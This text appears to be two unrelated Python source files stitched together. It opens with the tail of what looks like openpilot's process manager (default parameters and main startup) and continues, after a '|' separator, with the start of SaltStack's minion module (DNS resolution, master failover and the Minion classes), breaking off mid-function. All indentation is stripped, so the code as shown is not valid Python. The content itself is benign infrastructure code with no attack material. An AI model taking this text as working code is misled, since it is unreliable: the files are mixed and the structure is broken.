("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.process import default_signals, SignalHandlingMultiprocessingProcess
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
self.eval_master(self.opts, failed=True)
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts, self.functions, self.utils)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains.
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
self.io_loop.start()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1})'
'both must be a positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False, proxy=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
@classmethod
def _target(cls, minion_instance, opts, data):
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.setup.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
